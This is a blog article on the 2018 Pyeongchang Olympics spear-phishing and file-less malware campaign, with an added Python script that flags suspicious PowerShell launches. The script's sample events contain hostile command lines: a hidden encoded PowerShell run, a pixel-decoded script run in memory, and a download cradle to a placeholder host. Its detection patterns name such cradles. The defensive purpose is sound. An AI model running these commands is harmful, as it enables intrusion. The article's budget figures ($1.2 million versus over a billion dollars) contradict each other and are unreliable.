used with permission from Tektonika (HP)
by Jasmine W. Gordon
With the world’s largest global sporting event officially underway, hacking prevention is probably the furthest thing from your mind. But it’s pretty high up on the event organizers’ minds. While it may not have hit mainstream headlines, an explosive spear phishing attack and other IT security issues have left this year’s event among the most hacked sporting events of all time. Cybercriminals want to steal the gold, and their recent tactics reveal a lot about the state of information security threats in 2018.
Not only is this year’s event one of the most political in history, but Wired points out that now, “In 2018, [it’s] also become a nexus of hacker skullduggery.” The complex cybercrime spree that began several weeks ago isn’t the work of your average script kiddies. The campaign involved a near-perfect symphony of hacking techniques, including social engineering, complex technical tactics, nightmarish malware, and more.
A spear phishing nightmare
On December 22, 2017, South Korean organizations associated with setting up for this massive event received an email that appeared to be sent from South Korea’s National Counter-Terrorism Center (NCTC). Not only was the purported sender a trustworthy source—the email was timed perfectly to coincide with NCTC’s on-the-ground anti-terror drills.
The email carried a document attachment containing an image with an embedded script, delivered through an HTML Application (HTA) implant. This opened a PowerShell back door at 2 a.m., when the attackers assumed the recipients weren’t actively using their work computers. Next, four strains of malware, dubbed Gold Dragon, Brave Prince, Ghost419, and RunningRAT by McAfee analysts, worked in tandem to help the hackers establish a persistent presence on the target’s network and siphon off whatever information they wanted from their victims’ computers.
How did this hack sneak through?
Attribution is notoriously difficult, particularly when it comes to such sophisticated campaigns. However, analysts project that the attacks are likely state-sponsored or, at least, politically motivated. Ryan Sherstobitoff tells CyberScoop that the attacks have certain signatures that point to perpetration by a group, not an individual.
One significant clue pointing to this conclusion is that the attacks aren’t financially motivated, at least not in the quick-payout style of today’s viral ransomware epidemic. Sherstobitoff says, “The persistent data exfiltration we see from these implants could give the attacker a potential advantage.”
If it proves true that the cyber attacks were politically motivated, you can throw it on a mounting pile of state-sponsored cybersecurity issues surrounding Pyeongchang. A notorious hacker outfit known as Fancy Bear has stolen and leaked documents with the purported intent of exposing athletes guilty of doping. A statement published on the group’s website hints there are more leaks to come, too.
3 hacking prevention lessons from Pyeongchang
This year’s event in Pyeongchang has a reported cybersecurity budget of $1.2 million. It’s no small amount, until you consider that the entire IT infrastructure was built from the ground up for the two-week event. The US Department of Homeland Security has officially warned tourists attending the event to beware of security issues, pointing to the usual culprits, like open Wi-Fi networks and the risks of out-of-date mobile software.
With over 300 computer systems hacked before the torch was even lit, security officials declined to say exactly how they were responding but made it clear they’re stepping up to meet the challenge. While you can keep your fingers crossed that tourists stay secure and hackers don’t manage to mess with official event scoring, there are plenty of practical hacking prevention insights in all this IT security drama. Here’s what you can learn from these sophisticated attacks:
1. Criminals are moving faster than the Jamaican bobsled team
The email attack was launched December 22, just two days after December 20, when the new tool Invoke-PSImage was released to the public. This tool enables steganography: it embeds a script in the pixels of a PNG image so the script travels inside an apparently harmless picture. In other words, it took hackers only two days to build the technical mechanisms of the attack.
“There is no need to use a zero day, because cybercriminals now develop and apply hacking tools much more quickly,” writes Raj Samani in Forbes. While zero-day threats are still a frightening reality, the idea that hacker collectives are moving so quickly could be even scarier.
2. Social engineering tactics are soaring
You can hardly blame the organizations who fell prey to the Pyeongchang email attacks. After all, the emails appeared to coincide perfectly with the anti-terror activities by the NCTC. When coupled with the scheduled 2 a.m. install of the back door and malware, it’s clear the cyber attacks in Pyeongchang—like most IT security incidents—were strategically planned.
3. Today’s IT security attacks are harder to detect
The email crime spree fits the profile of file-less attacks. The name is a misnomer, since threats in this category aren’t truly file-free; they’re simply much harder to detect than traditional ways of dropping malware on disk. File-less attacks rely on vulnerabilities within whitelisted programs, such as Flash and the Windows PowerShell tool, to deposit malware. Last year, 77 percent of compromised security incidents were file-less. In general, this category is 10 times more effective than alternatives.
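Because file-less attacks like this one live in trusted tools rather than in a malicious executable, detection has to look at how those tools are launched rather than at file signatures. The following Python script is an added example written for this article, not code from the original post, from McAfee, or from the Invoke-PSImage project. It scores constructed process-creation events (an assumed Sysmon-style layout of timestamp, parent image, image and command line, built inline for the demonstration) against the traits described above: PowerShell spawned by an HTA or Office parent, a launch in the small hours, a hidden window with an encoded command, a script decoded from image pixels, and an in-memory download cradle. The indicator strings for the image-pixel loader (System.Drawing, Bitmap, GetPixel) and the weights are assumptions; tune them against your own environment.

```python
import ntpath
import re
from dataclasses import dataclass
from datetime import datetime

# Constructed sample events (assumed layout, loosely modelled on Sysmon Event ID 1):
# timestamp | parent image | image | command line
SAMPLE_EVENTS = [
    # HTA implant launching a hidden, encoded PowerShell stage at 2 a.m.
    "2017-12-22T02:04:11|C:\\Windows\\System32\\mshta.exe|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|"
    "powershell.exe -NoP -W Hidden -Exec Bypass -EncodedCommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA",
    # Second stage reading a script back out of PNG pixels and evaluating it in memory
    "2017-12-22T02:05:30|C:\\Windows\\System32\\cmd.exe|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|"
    "powershell -nop -c \"Add-Type -A System.Drawing;$g=New-Object System.Drawing.Bitmap('C:\\Users\\Public\\banner.png');IEX($s)\"",
    # Benign scheduled maintenance script during business hours
    "2017-12-22T09:15:02|C:\\Windows\\explorer.exe|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|"
    "powershell.exe -File C:\\Scripts\\backup.ps1",
    # Office document spawning a download cradle in the afternoon
    "2017-12-22T14:30:45|C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|"
    "powershell -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')\"",
    # Unrelated process at 2 a.m., included to show it scores zero
    "2017-12-22T02:10:00|C:\\Windows\\explorer.exe|C:\\Windows\\System32\\notepad.exe|notepad.exe",
]

# Command-line indicators: each category counts once. Patterns and weights are assumptions.
INDICATORS = [
    ("hidden window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I), 1),
    ("execution policy bypass", re.compile(r"-exec(?:utionpolicy)?\s+bypass", re.I), 1),
    ("encoded command", re.compile(r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}", re.I), 1),
    ("script read from image pixels", re.compile(r"system\.drawing|\bbitmap\b|getpixel", re.I), 1),
    ("invoke-expression", re.compile(r"\biex\b|invoke-expression", re.I), 1),
    ("download cradle", re.compile(r"downloadstring|downloadfile|net\.webclient|invoke-webrequest", re.I), 1),
]
# Parents that rarely have a legitimate reason to start PowerShell (assumed list).
SUSPICIOUS_PARENTS = {"mshta.exe", "winword.exe", "excel.exe", "powerpnt.exe", "wscript.exe", "cscript.exe"}
PARENT_WEIGHT = 3       # a document or HTA host spawning PowerShell is the strongest single signal
OFF_HOURS_WEIGHT = 1    # PowerShell between midnight and 06:00 adds a little weight
OFF_HOURS_END = 6
THRESHOLD = 3           # events scoring at or above this are reported


@dataclass
class Event:
    timestamp: datetime
    parent: str
    image: str
    command_line: str


@dataclass
class Finding:
    event: Event
    score: int
    reasons: list


def parse_event(line):
    """Split one pipe-delimited sample line into an Event."""
    ts, parent, image, cmdline = line.split("|", 3)
    return Event(datetime.fromisoformat(ts), parent, image, cmdline)


def _basename(path):
    # ntpath handles Windows separators even when this runs on Linux
    return ntpath.basename(path).lower()


def is_powershell(event):
    return _basename(event.image) in {"powershell.exe", "pwsh.exe"}


def score_event(event):
    """Return (score, reasons) for a single process-creation event."""
    score, reasons = 0, []
    parent = _basename(event.parent)
    if is_powershell(event):
        if parent in SUSPICIOUS_PARENTS:
            score += PARENT_WEIGHT
            reasons.append(f"PowerShell spawned by {parent}")
        if 0 <= event.timestamp.hour < OFF_HOURS_END:
            score += OFF_HOURS_WEIGHT
            reasons.append(f"PowerShell launched at {event.timestamp:%H:%M} (off-hours)")
    for name, pattern, weight in INDICATORS:
        if pattern.search(event.command_line):
            score += weight
            reasons.append(name)
    return score, reasons


def analyze(lines, threshold=THRESHOLD):
    """Parse and score every line; return only the events that reach the threshold."""
    findings = []
    for line in lines:
        event = parse_event(line)
        score, reasons = score_event(event)
        if score >= threshold:
            findings.append(Finding(event, score, reasons))
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"{f.event.timestamp:%Y-%m-%d %H:%M} score={f.score} "
              f"{_basename(f.event.parent)} -> {_basename(f.event.image)}")
        for reason in f.reasons:
            print("   -", reason)
```

Run against the constructed events, the script reports three findings: the 2 a.m. HTA-to-PowerShell launch, the pixel-decoding second stage, and the afternoon Word-spawned download cradle, while the scheduled backup script and the Notepad launch score zero. The point of weighting the parent process highest is that a signature-based scanner sees nothing unusual in powershell.exe itself; the process ancestry and the launch time are what give the file-less chain away.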
The growth of file-less attacks, sophisticated social engineering, and rapid-fire hacker coding is bad news if your security relies solely on old-school protection methods, like traditional, signature-based antivirus. It’s not good news any way you slice it, but you’ve got less to worry about if you have best-in-class security solutions in your corner, like a business printer that’s engineered to detect attacks and self-heal to prevent them from infecting your entire network.
With over a billion dollars put into cybersecurity, you can’t say the organizations working to support this year’s event in Pyeongchang weren’t invested in hacking prevention. While you can hope the spear phishing attack in late December represents the worst cybersecurity issue of the event, the signatures of the likely state-sponsored hack teach some invaluable lessons on the state of cybersecurity in 2018.